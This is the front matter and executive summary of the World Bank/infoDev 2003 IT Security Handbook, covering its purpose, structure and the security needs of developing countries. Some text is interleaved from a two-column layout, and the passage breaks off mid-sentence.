I T - S E C U R I T Y I N F O R M A T I O N T E C H N O L O G Y S E C U R I T Y H A N D B O O K by George Sadowsky James X. Dempsey Alan Greenberg Barbara J. Mack Alan Schwartz © 2003 The International Bank for Reconstruction and Development / The World Bank 1818 H Street, NW Washington, DC 20433 Telephone 202-473-1000 Internet www.worldbank.org E-mail feedback@worldbank.org All rights reserved. The findings, interpretations, and conclusions expressed herein are those of the author(s) and do not necessarily reflect the views of the Board of Executive Directors of the World Bank or the governments they represent. The World Bank does not guarantee the accuracy of the data included in this work. The boundaries, colors, denominations, and other information shown on any map in this work do not imply any judgment on the part of the World Bank concerning the legal status of any territory or the endorsement or acceptance of such boundaries. This Handbook is distributed on the understanding that if legal or other expert assistance is required in any particular case, readers should not rely on statements made in this Handbook, but should seek the services of a competent professional. Neither the authors, nor the reviewers or The World Bank Group accepts responsibility for the consequences of actions taken by readers who do not seek necessary advice from competent professionals, on legal or other matters that require expert advice. Rights and Permissions The material in this work is copyrighted. Copying and/or transmitting portions or all of this work without permission may be a violation of applicable law. The World Bank encourages dissemination of its work and will normally grant permission promptly. Portions of this publication have been extracted, with permission of the publisher, from Simson Garfinkel, Gene Spafford, and Alan Schwartz, Practical Unix and Internet Security, 3rd edition, © O'Reilly & Associates, Inc., February 2003, and Simson Garfinkel and Gene Spafford, Web Security, Privacy and Commerce, 2nd edition, © O'Reilly & Associates, Inc., January 2002. For permission to photocopy or reprint any part of this work, please send a request with complete information to the Copyright Clearance Center, Inc., 222 Rosewood Drive, Danvers, MA 01923, USA, telephone 978-750-8400, fax 978-750-4470, www.copyright.com. All other queries on rights and licenses, including subsidiary rights, should be addressed to the Office of the Publisher, World Bank, 1818 H Street NW, Washington, DC 20433, USA, fax 202-522-2422, e-mail pubrights@worldbank.org. Design: Studio Grafik, Herndon, VA GLOBAL INFORMATION AND COMMUNICATION TECHNOLOGIES DEPARTMENT THE WORLD BANK 1818 H STREET · NW WASHINGTON · DC 20433 USA telephone 202.458.5153 facsimile 202.522.3186 email infodev@worldbank.org website infodev.org ISBN 0-9747888-0-5 INFORMATION FOR DEVELOPMENT PROGRAM A C R O N Y M S ICT Information and Communication Technology OECD DAC Organization for Economic Cooperation and Development's Development Assistance Committee MDGs Millennium Development Goals NGO Non­Government-Organization WSIS World Summit on the Information Society DotForce Digital Opportunity Task Force of the G8 states. G8 Major industrial democracies have been meeting annually since 1975 to deal with the major economic and political issues facing their domestic societies and the international community as a whole. These states ­ the G8 ­ contain France, USA, Germany, Japan, Italy, Great Britain, Canada and ­ since the Birmingham Summit in 1998 - Russia. UN ICT Task Force United Nations Information and Communication Technology Task Force PDA Personal Digital Assistant SME's Small and Medium Enterprises HIPC Highly Indebted Poor Countries FDI Foreign Direct Investment OECD Organization for Economic Cooperation and Development DFID Department for International Development ITDG Intermediate Technologies Development Group VoIP Voice-over-Internet-Protocol Information Technology Security Handbook iii C O N T E N T S 1 PREFACE 125 CHAPTER 9. COMPUTER CRIME 130 CHAPTER 10. MOBILE RISK MANAGEMENT 7 EXECUTIVE SUMMARY 139 CHAPTER 11. BEST PRACTICES: BUILDING SECURITY CULTURE 144 CHAPTER 12. GENERAL RULES FOR 13 PART 1. INTRODUCTION COMPUTER USERS 14 CHAPTER 1. IT SECURITY IN THE DIGITAL AGE 150 CHAPTER 13. GLOBAL DIALOGUES ON SECURITY 29 PART 2. SECURITY FOR INDIVIDUALS 163 PART 4. INFORMATION SECURITY AND 30 CHAPTER 1. INTRODUCTION TO SECURITY GOVERNMENT POLICIES FOR INDIVIDUALS 164 CHAPTER 1. INTRODUCTION 31 CHAPTER 2. UNDERSTANDING AND 167 CHAPTER 2. PROTECTING GOVERNMENT SYSTEMS ADDRESSING SECURITY 174 CHAPTER 3. THE ROLE OF LAW AND GOVERNMENT 35 CHAPTER 3. KEEPING YOUR COMPUTER POLICY VIS A VIS THE PRIVATE SECTOR AND DATA SECURE 176 CHAPTER 4. GOVERNMENT 43 CHAPTER 4. KEEPING YOUR CYBER-SECURITY POLICIES OPERATING SYSTEM AND APPLICATION SOFTWARE SECURE 47 CHAPTER 5. MALICIOUS SOFTWARE 189 PART 5. IT SECURITY FOR 53 CHAPTER 6. SECURING SERVICES OVER NETWORKS TECHNICAL ADMINISTRATORS 63 CHAPTER 7. TOOLS TO ENHANCE SECURITY 190 CHAPTER 1. BACKGROUND 68 CHAPTER 8. PLATFORM SPECIFIC ISSUES 196 CHAPTER 2. SECURITY FOR ADMINISTRATORS 73 ADDENDUM 1. INTRODUCTION TO ENCODING 209 CHAPTER 3. PHYSICAL SECURITY AND ENCRYPTION 220 CHAPTER 4. INFORMATION SECURITY 77 ADDENDUM 2. TCP/IP 238 CHAPTER 5. IDENTIFICATION AND AUTHENTICATION 79 ADDENDUM 3. MINI-GLOSSARY OF TECHNICAL TERMS 266 CHAPTER 6. SERVER SECURITY 288 CHAPTER 7. NETWORK SECURITY 314 CHAPTER 8. ATTACKS AND DEFENSES 81 PART 3. SECURITY FOR ORGANIZATIONS 326 CHAPTER 9. DETECTING AND MANAGING A BREAK-IN 82 CHAPTER 1. INTRODUCTION 341 CHAPTER 10. SYSTEM-SPECIFIC GUIDELINES 86 CHAPTER 2. OVERVIEW OF E-SECURITY RISK MITIGATION 94 CHAPTER 3. RISK EVALUATION AND LOSS ANALYSIS 351 ANNEXES 101 CHAPTER 4. PLANNING YOUR SECURITY NEEDS 352 ANNEX 1. GLOSSARY 105 CHAPTER 5. ORGANIZATIONAL SECURITY POLICY 362 ANNEX 2. BIBLIOGRAPHY AND PREVENTION 371 ANNEX 3. ELECTRONIC RESOURCES 112 CHAPTER 6. PERSONNEL SECURITY 378 ANNEX 4. SECURITY ORGANIZATIONS 117 CHAPTER 7. SECURITY OUTSOURCING 384 ANNEX 5. PRINT RESOURCES 122 CHAPTER 8. PRIVACY POLICIES LEGISLATION, AND GOVERNMENT REGULATION Information Technology Security Handbook v F O R W A R D he Preparation of this book was fully funded by a grant from the infoDev Program of the World Bank Group. T The topic of Information Technology (IT) security has been growing in importance in the last few years, and well recognized by infoDev Technical Advisory Panel. We would like to thank the State Secretariat of Economic Affairs of Switzerland (SECO) for having been instrumental not only in providing the funding for this project, but also in recognizing the urgency of the matter and allowing this book to come to fruition. We recognize the fundamental role of Informational and Communication Technologies (ICT) for social and economic development. Similarly, we recognize that there cannot be an effective use of ICT in the absence of a safe and trusted ICT environment. Thus, IT security plays a prime role in helping creating the environment needed to set the ground for implementing successful national ICT plans, e-Government or e-Commerce activities, as well as sectoral projects, such as, for example, in the areas of education, health, or finance. IT security is a complex topic and evolves almost as fast as technology does. The authors have succeeded in providing technology-independent best practices, as well as recommendations for particular IT environments. As technology evolves, the accompanying web site (www.infodev-security.net) will provide updates as appropriate, allowing for a constant dissemination of developments in the field of IT security. While the opinions and recommen- dations made in this book do not necessarily reflect the views of infoDev or The World Bank Group, we believe that the combination of the book and its supporting web site will make a valuable contribution to the understanding of IT security around the globe. The book is composed of five parts, each of which can be read independently. After an introduction to general issues of IT security, the book addresses issues relevant specifically to individuals, small and medium organizations, government, and technical administrators. Although most of the research and publications on IT security comes from developed countries, the authors have attempted to provide practical guidance applicable anywhere and to include examples from developing countries. We hope that this book and its supporting web site will provide the beginning of an interactive process, where the content and best practices will evolve overtime as technology advances, but more importantly, as readers will share their experiences and best practices with their peers. Mohsen A. Khalil Director, Global Information and Communication Technologies Department The World Bank Group Bruno Lanvin Program Manager, infoDev Program The World Bank Group Michel H. Maechler InfoDev Task Manager Senior Informatics Specialist The World Bank Group vi Review Walter Duss Bertrand Livinec, CISA Vice President, Practice Lead Sub-Saharan Committee swiss interactive media and Francophone Africa Region software association (simsa) Group Risk Management Solutions Managing Director, (GRMS) Members ASP Konsortium Switzerland PriceWaterhouseCoopers Wilen, Switzerland Paris, France Information Technology Kurt Haering Michel Maechler, CISA, CISM Security Handbook President Senior Informatics Specialist EFSI AG Global Information and Basel, Switzerland Communications Technology, Policy (Formerly President of Division Infosurance, Zürich, The World Bank Switzerland) Washington, DC, USA Thomas Kellermann, CISM Scott Musman Senior Data Risk Management President and CEO Specialist Augmented Systems Financial Sector Operations & Alexandria, VA, USA Policy Department (Formerly Director of Research and The World Bank Development at IMSI) Washington, DC, USA David Satola Werner Lippuner, CISA Senior Counsel Senior Manager, Finance, Private Sector Dvt, & Technology and Security Infrastructure Risk Services ­ Public Sector Legal Department Ernst & Young LLP The World Bank Washington, DC, USA Washington, DC, USA Information Technology Security Handbook PREFACE 1 I N F O R M A T I O N P R E F A C E T E C H N O L O G Y S E C U R I T Y H A N D B OheOrecent T K evolution of Information and In the last 50 years, much has changed. The personal Communication Technologies (ICTs) and the sub- computer revolution which started in the mid-1970's stantial innovation in the sector have resulted has put computers of remarkable size and power into in a significant increase in productivity as well as the the hands of hundreds of millions of people at the emergence of a wealth of new goods and services. present time. In addition, the Internet and other forms As the power, capacity, and cost of microelectronics con- of personal networking have enabled computer-to- tinue to improve, providing a 30% gain, approximately, in computer communications among many of those people. productivity and power per unit of cost each year, we Twenty-five years ago computing and communications have all been beneficiaries of these trends. Today we live were generally handled by a small group of relative in a digital world, where information processing is inex- experts; today hundreds of millions of people use pensive and telecommunications costs are decreasing. It computers for every imaginable information- is an increasingly interconnected world. processing task. They are tied together by a powerful communications network, the Internet, The wealth of new technical possibilities gives rise not that allows expanded interpersonal communication only to new products and more efficient and effective via e-mail and instant messaging. The Internet also ways of doing things, but also to the possibility of mis- provides easy and relatively inexpensive access to a use of the technology. Like other technologies, ICTs are rich and growing body of digital content. Yet with these essentially neutral, and can be used in ways that most of rapid technology advances, trouble spots have emerged us would consider beneficial, as well as in ways that are as well. The average networked computer user of the harmful. The work of ICTs is done at microsecond speed, 1970s was a professional computer specialist; today the carrying information invisible to the naked eye, under the average user is fairly ignorant, or at least is uncon- control of software developed by people, so harmful cerned with the technical details involved with the intentions in this environment are often carried out rap- operations of the computer and its network. As a result, idly, invisibly, and are difficult, if not impossible, to trace. these casual users may fail to put proper security soft- ware packages and procedures in place, so that weak The problems associated with securing information sys- links in the network may be exploited by hackers or tems, the processes that depend on them, computer criminals, regardless of the respective geo- and the information that is transmitted and stored graphical locations of the user, the exploiter, and the in electronic form, are not new. Major commercial system being exploited. systems implemented on computers have been in exis- tence for about 50 years. The commercial banking system If you use computers at home or at work, you have has been executing electronic funds transfers a certain level of responsibility for them and this publica- for about the same amount of time. In these commercial tion will help you understand the procedural and technical systems, there are strong incentives for criminals to details of managing either a single computer or a net- attempt to compromise both solitary computers and com- worked group of computers. Security is everyone's busi- puter networks for personal gain. In reaction to ness, whether you are a casual user, a technician, a sys- the rise in opportunities for criminal activity, significant tem administrator, a network administrator, or a manager research and development initiatives have been with responsibility for systems or networks. Understanding launched to produce stronger security measures for what the central security issues are, taking prudent both information processing and communications. actions to protect your systems, and putting a set of effective security policies in place are critical steps you must take to ensure that your machines and information 2 PREFACE will be secure from unauthorized access and that you will One outcome of the report was the creation of the be able to exchange that information securely with others United Nations Secretary General's ICT Task Force. on the network. Another was the creation of the Global Digital Opportunities Initiative, sponsored by UNDP, This Handbook is being prepared during a time of the Markle Foundation, and Accenture. Bilateral excitement about the potential of ICTs in furthering aid agencies gave increased attention to ICT in their economic and social development. While ICTs have been development plans. The ITU and UNESCO made plans used for 40 years or more in many sectoral projects to host a series of two global summit meetings, the implemented by multilateral and bilateral aid agencies, World Summit on the Information Society (WSIS), in the notion that ICTs are a critical crosscutting theme for Geneva (December 2003) and in Tunis (April 2005).2 many development initiatives is relatively new, dating back to the rise of the Internet in the early 1990s. This ICTs have the potential to support, in an indirect concept was first formalized in a multilateral agency by manner, many activities aimed at achieving the the infoDev Program at the World Bank Group in 1995, Millennium Development Goals (MDGs).3 Responsible and was supported by the strong vision that its President, IT security policies and implementation in a country will James Wolfensohn, projected on the importance of encourage the flow of foreign direct investment into that knowledge sharing for economic and social development. country. These flows will assist in financing the extension Since that time, optimism in the development community of a secure infrastructure that will allow ICT to contribute has run high, fed in part by the enthusiasm generated by to these goals. technological developments embodied in low-cost PCs and the World Wide Web. It's appropriate to ask why a publication such as this, written primarily for readers in developing countries, In 2001, the G-8 countries established the Digital is needed. After all, the principles of security are the Opportunity Task Force (DOT-Force). The DOT-Force same, whether you are in a developed or a developing presented the conclusions of its work in a report and country. The technology is similar and the threats can proposed the nine-point Genoa Plan of Action, both come from any part of the world, no matter where you of which were fully endorsed by G8 Leaders at their are located. A great deal of material has already been 2001 Genoa Summit. The original membership of written about computer and network security and is DOT-Force includes stakeholders from the G8 and available, although not always conveniently or cheaply, developing country governments, the private and in developing countries. not-for-profit sectors, and a range of international organizations.1 The report presented seven action First, it is important to remember that computer points as critical issues for creating the information users and administrators in developed countries and society: regions have abundant access to technical and user information that assists them in their work. Bookstores 1) policy support; and libraries are plentiful. Many technically skilled 2) improved access; people use computers, so advice and assistance from 3) human resource development; peers is easily obtained. When computer or network 4) cultivation of entrepreneurs and entrepreneurial problems arise, such as the spread of a virus, there is activity; a rich set of information channels through which news 5) participation by developing countries in and security patches are transmitted. Organizations international conferences in IT; using computers and networks have help centers 6) IT for health; and staffed by technical specialists who are alert to the 7) local content and applications possibilities of misuse and make efforts to protect their organization's resources. 1About the DOT-Force, http://www.dotforce.org/about/,para 1. 2Information about summits, regional conferences and other events of the WSIS is available at: http://www.itu.int/wsis/ 3See the UN Secretary General's Report on Implementation of the UN's Millennium Declaration which is available as a pdf file on the MDG website: http://www.un.org/millenniumgoals/ Information Technology Security Handbook PREFACE 3 Users and technical administrators in developing coun- theft of its confidential customer data, or an accidental tries often lack such support. The density of users or deliberate alteration of key business information? is low, so anecdotal evidence that may contain warnings Developing countries need to build capacity in terms of and solutions is lacking. Organizations using computers trained human resources and in terms of the technologi- are often so short-staffed that they cannot afford to cal infrastructure that will protect them from being easy monitor and support their internal technical resources targets of hackers and computer criminals. sufficiently. Many times, basic precautions are not taken because the underlying knowledge of computer systems In preparing this publication, we have had considerable and network security is insufficient. For groups that discussion of what the title should be, in part because understand the basics, there may be gaps in understanding there are various views regarding what needs to be how to adapt general technical guidelines to diverse and secured. Persons concerned with content tend to view ever-changing circumstances in the field. Vendor support, this as an information security issue. Others, concerned which was abundant in past years when only a few large with the technical mechanisms for storing and transmit- and expensive computers were purchased, simply does not ting information, may view it as a system and network exist at the mass level at the present time. Computer security issue. Still others may view it as an extension of stores and repair services are often unaware of problems e-business and think of the area as e-security. affecting other parts of the world. As a result, users and administrators are victims of information poverty in IT We have chosen to think of this set of issues under security, an area where they should be well informed and the umbrella of information technology security. up-to-date. By this we mean to include all of the mechanisms for storing, processing and transmitting information Failures in security occur in all countries and some including hardware, software and communications facili- breaches are made public in the press or through ties, but with an equal focus upon the security various electronic means. Many failures are not reported, of the information itself. It is important that both however, in part because of embarrassment and in part the information and the mechanisms that process because public knowledge of the failure could lead to it in any way be secure from compromise. further intrusions and unwanted results. Organizations and governments in developed countries can generally We have, however, intentionally limited the focus withstand some level of security failure. However, the of this publication to computers, software, and networks, consequences of security failures in developing countries realizing that there is a rich set of issues in the area could be considerably more serious than in the developed of fixed line and mobile telephony that have not been countries. It is our belief that businesses, organizations, addressed in details here. As the convergence of telephony and governments in developing countries do not have the and computers continues, these issues are likely to same degree of resiliency to recover from such failures, become more important. With the emergence because lack of awareness may lead to more massive of voice over IP and ENUM, digital telephony protocols breaches and because a malicious attack may be that are increasingly used, and the emergence of 3G more catastrophic, in terms of money, reputational technologies, there are clearly security issues in this and psychological effects (loss of trust), and the time space that will need to be understood and addressed. required to fix the problems, if they are reparable at all. This publication has been created so that it can be Developing countries should regard security as a top provided to the developing world without cost, thanks priority, for the opportunity costs of not doing so may to a farsighted collaboration between the State be very high indeed. For example, criminal activity will Secretariat for Economic Affairs of the Government migrate to places where controls are poor and security of Switzerland and the infoDev program managed by is weak. E-commerce and e-business activities are likely the World Bank. The goal is not only to achieve wide dis- to make interesting targets in countries that are less con- tribution of the hardcopy version of the publication, but scious of IT security. What small or medium size business also to provide its contents on a universally accessible could survive an erasure of its electronic business files, web site. This web site will be dynamic 4 PREFACE in two ways. First, the site's content will be updated as in documents, legislation, and research projects. needed to make it current, applicable, and effective for It is more or less synonymous with the term readers in developing countries. Second, the web site "Internet security," a term that we do not use will include, as appropriate, contributions from readers in this Handbook, but which is sometimes used who provide material that assists in the evolution of the in other publications. Both terms focus on the site/handbook and that offers additional guidance to network aspects of security and the policy those seeking information on IT security. implications of a networked world, including issues in privacy, crime, commerce, and global The following material is organized into five parts, communications. The line between these terms each of which is oriented to specific groups of readers. is not sharp; as we have seen in many chapters Observant readers will notice that there is occasionally of this Handbook, the security of your computers, significant repetition across parts. This is intentional, networks, and data are critically intertwined with since we believe that many readers will select and read the more ephemeral concept of security in cyberspace. only those parts that they believe are relevant to them. The term "cyber-security" appears often in Part 4. Some of the parts, notably the part describing security and the individual, could possible be extracted and In a fast moving technical environment, the reference distributed independently to individual computer users material in these annexes risks becoming out of date who might well have no need of any of the other parts. soon after it is published. In order to make this a living document, all of its sections can be found on the web In preparing such a publication, we have had to site www.infodev-security.net and each section will be balance the need to impart general principles with updated periodically with additional useful information, specific examples and practical information. We hope with the date of last update at the bottom of each page. that the balance represented here is approximately Readers who would like to recommend material to be correct. However, as the technology evolves and used for updating the document on the web are encour- matures, the technical details are going to change. aged to do so by sending suggestions via The principles, if well chosen, are likely to be invariant, e-mail to contact@infodev-security.net. so that the reader should work toward an understanding of the principles, both on the policy and management This Handbook would not have been possible without side and on the technical side. If the principles are the support and dedication of a number of key well understood, then the technical solutions will individuals and institutions. always be discoverable for implementation. Simson Garfinkel deserves special recognition for his The reader will note that the authors of the Handbook early guidance in critiquing the initial structure of the have used several different terms to refer to security publication. He further assisted in helping to identify and computing. In general, we have referred to and assemble part of the team to prepare the Handbook. IT security, as it can serve as an umbrella for: The publication would not have been possible without his advice and assistance. 1) computer security: security in a technical context: machines, software, data, and networks. The term Bruno Lanvin, Manager of the infoDev Program of "computer security" is commonly used in Part 2 the World Bank Group, deserves substantial credit and Part 5, as these Parts are focused on the physical, for understanding the relevance and power of knowledge infrastructural, and technical aspects of IT security, and creation and distribution in the field of ICT. His support in the production of this publication has been reassuring 2) cyber-security: IT security in a government/public and welcome. He has been ably assisted by his colleagues policy context. The term "cyber-security" is commonly Jacqueline Dubow, Ellie Alavi, Teri Nachazel and Henri used by government agencies and public policy makers Bretadeau of the infoDev staff. Information Technology Security Handbook PREFACE 5 We are extremely grateful to Tim O'Reilly, who provided in developing countries. His persistence in obtaining access to the material contained in two important the support of the Swiss Government for the infoDev books published by his company, O'Reilly & Associates: project to produce this Handbook was absolutely PRACTICAL UNIX AND INTERNET SECURITY 3RD EDITION essential, and his personal support for the idea of the (Simson Garfinkel, Gene Spafford, and Alan Schwartz, Handbook has carried us forward over the past year. O'Reilly & Associates, Inc. 2003) and WEB SECURITY, PRI- VACY & COMMERCE (Simson Garfinkel with Gene Spafford, Michel Maechler assembled an energetic and able set O'Reilly & Associates, Inc. 2002). These books were used of experts to review drafts of this material. Together to develop significant parts of this Handbook and a num- they made many valuable suggestions that contributed ber of sections have been reprinted with permission from to the accuracy, readability, and relevance of the final these authors and the publisher. version of the publication. We are grateful for their col- lective experience and for their constructive guidance. In addition, for the last ten years, O'Reilly & Associates have donated tens of thousands of technical books We would like to express our gratitude to all of these to people from developing countries who have attended people for their assistance and support in preparing training workshops run by the Internet Society and the first version of this document. similar organizations. Readers who have observed the state of libraries and access to published material in the This Handbook is not intended to be a tutorial on developing world will understand how significant O'Reilly's Unix, Windows, or Macintosh platforms, nor is it a contribution is towards the ability of these countries to system administration tutorial. Use this Handbook introduce, spread, and exploit the Internet in their as an adjunct to tutorials and administration guides. countries and thereby reduce of the digital divide. Managing wide-scale changes in computer systems may make them more difficult to maintain, even though We want to warmly thank the authors of the above the changes are needed to provide better security overall. O'Reilly books, Simson Garfinkel, Alan Schwartz, For the convenience of the readers, we have referred to and Gene Spafford, for their able and willing assistance many respected online resources. However, as readers in making the material in the above books suitable consider using programs and suggested fixes posted on for use for parts of this Handbook. Their spirit of willing- the Internet, caution should be exercised. It can be ness to help exemplifies the best that is in challenging to evaluate the overall security impact of the original Internet culture of professional changes to your systems kernel, architecture, or commands. cooperation and information sharing. If third party patches and programs are routinely down- loaded and installed to improve system security, overall We also thank Tom Kellermann, Senior Data Risk security may worsen in the long term. Attention must be Management Specialist in the Integrator Group paid to compatibility with system requirements and the and Treasury Security Team of the Operations Policy quality and reputation of the companies offering pro- Department at The World Bank for his advice and grams and advice. We hope that this Handbook will make support. His materials on e-finance, blended threats, these tasks easier and we trust that our readers will help and mobile risk management have been particularly us refine this text over time. valuable to the team and are reflected frequently in Part 3 of this Handbook. Max Schnellmann, Switzerland's representative to the infoDev Donor's Committee meeting in Chongqing, China in December 2002, was among the first to realize that an IT security handbook would be extremely useful Information Technology Security Handbook EXECUTIVE SUMMARY 7 E X E C U T I V E S U M M A R Y Information Technology Security Handbook is a practical or disruption of their current computing behavior. guide to understanding and implementing IT security in Small and medium sized organizations may also your home or business environment. It has been written delay securing their systems for these reasons; primarily for readers in developing countries, although in addition, they may deploy a technical solution, the Handbook provides best practices valid in any situa- such as a firewall, but may not take a layered tion. In addition to summarizing current physical and approach to security, without which their defense electronic threats to IT security, the Handbook also perimeter will still be weak. SMEs may neglect to explores management practices, regulatory environments, put clear security policies and procedures in place and patterns of cooperation that exist among businesses, for managers and employees to follow. If communications, governments, professional associations, and international awareness, and training are lacking throughout the agencies today. The Handbook is structured in five Parts organization, the technological defenses could be com- that may be circulated individually, though the greatest promised quite easily through negligence before actively benefits will be obtained by reviewing the document in malicious behavior was even a factor. its entirety. This Executive Summary will cover the main themes of the Handbook and will offer a brief mapping Technology in a Changing Environment: of each Part in "Highlights from the Handbook." Mobile Devices, Emerging Applications, and Blended Threats create complexity Adoption of ICTs Is on the Rise... New and inexperienced users are not the only cause The Handbook begins with an overview of the growth of of IT security breaches at the present time. The ICT the Information Communication Technology (ICT) sector, environment is also changing rapidly with the introduc- as we know it today. This growth includes individual users tion of new products, especially mobile devices (laptops, of ICTs, as reflected in the rise in the number of home cellular phones, and Personal Digital Assistants, for networks and growth in the small and medium sized example) that present different challenges to infrastruc- enterprise sector which relies on computing resources in ture and data security. Emerging computing applications support of non-technical business endeavors, (restaurants including e-finance and e-commerce also create com- or retail shops, for example) and in businesses that are plexity in the networked environment. From ATM tightly linked to technology development and deployment machines to online banking, these capabilities offer around the world (small software firms or technology out- convenience and cost savings, but they also introduce sourcing service providers, for example). new opportunities for theft and fraud. To make matters worse, would-be attackers are now able to develop Yet Knowledge of IT Security Practices blended threats: combinations of viruses, worms, and Lags Behind Trojans that may cause greater damage to systems and data than the individual forms of such "malware" can While the expansion of the market for technology products cause alone. Since all of these developments affect and services has been dramatic at the individual and the users of technology worldwide, the best solutions will organizational level, knowledge of IT security issues has come through international cooperation. lagged behind. Individual users may not be aware of the risks involved with surfing the Internet on their home computer. If they do recognize the dangers of unpro- tected networking, they may still postpone learning about firewalls, virus scanners, encryption, and regular maintenance due to the perceived financial costs, time investment, 8 INFORMATION SECURITY AND GOVERNMENT POLICIES International Cooperation and Security in Awareness of general IT security issues, including the the Developing Country Context existence and prevalence of specific security threats will help users, managers, and policy makers design effective IT security is a critically important issue for developing strategies to strengthen their networks, at home and countries. It is well understood that the Internet offers at work, against breaches. opportunities for communications and commerce that were hardly imaginable ten years ago. Though access is Highlights for Part 2. IT Security for not always cheap, the Internet enables users to view Individuals a tremendous variety of content and people connect via e-mail far more efficiently than they could through Part 2 of the Handbook is aimed at individuals who use traditional postal services. The Internet has also computing and networking resources for a variety of affected international trade frontiers; businesses in purposes, whether they are at home or in an office developing countries may now offer their goods and environment. This part may also be relevant for small services online ­ although the market may still be organizations that cannot fully address IT security crowded with competitors, at least prospective policy and its administration at an organizational level. customers can find information about companies, It explains principal security issues for individual users their capabilities, and their products without and offers guidelines on techniques that will minimize having deep local knowledge. While the potential the threat of a security penetration (if they are for businesses to reach across geographic borders properly employed). is exciting, it will take a significant amount of international cooperation to sustain the vision Some of the issues and techniques described in Part 2 of a productive, globally networked world. include: · why computer and network security are necessary; the impact of security breaches; I. HIGHLIGHTS FROM THE · physical security, backups, and authentication HANDBOOK: IT SECURITY FOR through usernames and passwords; DEVELOPING COUNTRIES · the various forms of malware (malicious software) and how they spread; Highlights for Part 1. · how e-mail and the Internet work and why they are a IT Security in the Digital Age vehicle for computer attacks; · software tools including virus checkers, firewalls and Part 1 of the Handbook provides an introduction to remote access tools; the general issues of security in an electronic age. · more advanced concepts such as TCP/IP networking While people have always been concerned about and encryption, for the interested user. security issues, the advent of computers and networks has changed the terrain in a manner in subtle ways. Part 2 covers these security issues and mitigation tech- This section describes the scope of IT security issues, niques in technical detail, with the individual user in explains several types of malicious behavior with respect mind; Part 3 looks at security from an organizational to computers and networks, and outlines the risks of perspective. operating without adequate security measures in place. Highlights for Part 3. Chapters of Part 1 include: IT Security for Organizations · The Digital Revolution · Defining Security Part 3 of the Handbook addresses the administrative and · Emergence and Growth of the Internet policy aspects of security from an organizational point · Overview of Security Issues of view. Good security policy and its effective implmen- · Perpetrators of Attacks on IT Security tation minimize the risk of accidental and deliberate Information Technology Security Handbook EXECUTIVE SUMMARY 9 losses, makes intrusions more difficult, and provides the Highlights for Part 4. tools to identify attacks and to repair security breaches. IT Security and Government Policies Such a combination of policy and implementation should aim to protect confidential data and help to Part 4 of the Handbook addresses security issues that assure the integrity of the programs and the data that need to be understood and handled at the governmental are stored and transmitted over the network. This part level. In addition to securing its own information covers the elements of effective security policy for a assets, a government has an obligation to set policy for range of organizations, including businesses, securing the national information infrastructure; governments, universities, and community, this policy has an important role to play in the or non-profit organizations. promotion of IT security. There is a paradox, however: a sound public policy framework can enhance security, Part 3 covers the following subjects in detail: but ill-considered government regulation can do more · the eight pillar approach to security, particularly harm than good. Technology is changing so rapidly valuable in a financial services or transaction-based and new cyber threats are emerging with such swiftness environment; that government regulation can become a straitjacket, · security risk evaluation and loss analysis in a busi- impeding the development and deployment of innova- ness context; tive responses. It is important therefore to achieve the · policy and procedural issues to consider during the right balance of regulatory and non-regulatory measures. security planning process; Clearly, government cyber-security policies must take · the role of management in ensuring computer, net- into account the technical and social characteristics of work, and data security; the Internet. Within this context, governments can take · personnel security: training and awareness, the hiring a range of steps to improve computer security, without process, and outsourcing the security function; interfering with technical design decisions.4 · computer crime, incident reporting, and recovery; · wireless technologies and emerging security threats Part 4 contains an in-depth discussion of the to the enterprise; following subjects: · additional guidelines and checklists aimed at design- · the communications network and other critical ing and implementing a strong organizational infrastructures that are owned and operated by the security practice. private sector, but regulated by the government; a picture of mutual dependency; Part 3 also provides an overview of public policies · the government's general role and responsibilities in that are directly related to business, non-profits, promoting sound computer security practices in the and government operations in a networked world and public, private, and non-profit sectors; concludes with excerpts from the World Bank's "Global · computer crime laws that must protect both government Dialogues" on IT security. Part 4 contains a deeper and privately-owned computers and networks; discussion of regulatory and public policy issues · traditional concepts of legal liability translated to the in "cyberspace" and examines these issues in an computer context; international context. · laws, regulations, and government policies that are focused on promoting computer security in areas of consumer protection, data and communications privacy, and frameworks for e-commerce; and 4The following discussion draws upon the detailed surveys compiled by the American Bar Association's Privacy & Computer Crime Committee: Jody R. Westby, ed., International Guide to Combating Cybercrime, American Bar Association, Section of Science & Technology Law, Privacy & Computer Crime Committee, 2003, http://www.abanet.org/abapubs/books/cybercrime/; Jody R. Westby, ed., International Strategy for Cyberspace Security, American Bar Association, Section of Science & Technology Law, Privacy & Computer Crime Committee, 2003. See also International Critical Information Infrastructure Protection Handbook, edited by Andreas Wenger, Jan Metzger and Myriam Dunn, Center for Security Studies and Conflict Research, Swiss Federal Institute of Technology (2002) http://www.isn.ethz.ch/crn. 10 EXECUTIVE SUMMARY · legal and policy models from a number of countries being used to offer information services (servers) and references to resources in relevant international and how to build servers that minimizes these organizations. problems; · network security from the hardware side (modems, Part 4 evaluates security from legal and public policy routers, and wireless access) to the software side perspectives. Part 5 takes a deeper look at the technical (TCP/IP, the dominant networking protocol on local means and procedures required to secure IT resources. area networks and the Internet); · the techniques that are used to attack workstations Highlights for Part 5. and servers, namely denial of service attacks, IT Security for Technical Administrators programmed threats, and social engineering; · how to use auditing, logging, and forensics to Part 5 is aimed at helping system and network help detect compromises and identify what's been \administrators perform their duties efficiently. modified on a compromised system; and finally, It covers security issues that need to be understood · technical recommendations that are specific to and addressed at a technical and managerial level, with Unix/Linux, Microsoft Windows, and MacOS 7-9 examples of how security breaches occur and advice on operating systems, MacOS X is covered by the how preventive measures may be taken. Other parts of Unix material. the Handbook covered an overview of the current com- puting environment, security for the individual user, Due to the volume and complexity of the material, security from an organizational standpoint, and the several annexes have been provided. Annex 1 contains legal and public policy implications of security risks and a Glossary of terms commonly used in information prevention. Part 5 explains in greater detail the specific technology and communication. Annexes 2-5 contain threats to security, including the various methods of a bibliography of references to security resources. These attack that are used to penetrate systems and program, sources include print resources, electronic resources, and the methods of monitoring critical systems and network a listing of organizations that focus on security issues. traffic so that attempted intrusions can be detected, the All readers of the Handbook are encouraged to learn best practices in securing such systems, and the appro- more about specific topics by referencing priate way to handle a security incident when a breach the items in the bibliography. has occurred. II. FUTURE STEPS AND Part 5 handles the following issues, with the systems CONCLUSIONS administrator in mind: · the design of secure systems and the methods of Digital technology provides us with exciting new tools system attackers; that can have a major impact on education, health, · the varied threats to IT security from environmental commerce, and other sectors of civil society. This tech- factors to vandalism, sabotage, and theft, with nology benefits all countries and peoples, but may have suggestions on how to address these threats; a special attraction for developing countries in that it · the mechanisms for protecting information from can help to accelerate their integration into the world unwanted exposure, tampering, or destruction, known economic community. The stakes are high for these as confidentiality (preventing unauthorized users countries. Foreign direct investment, confidence, and from accessing or 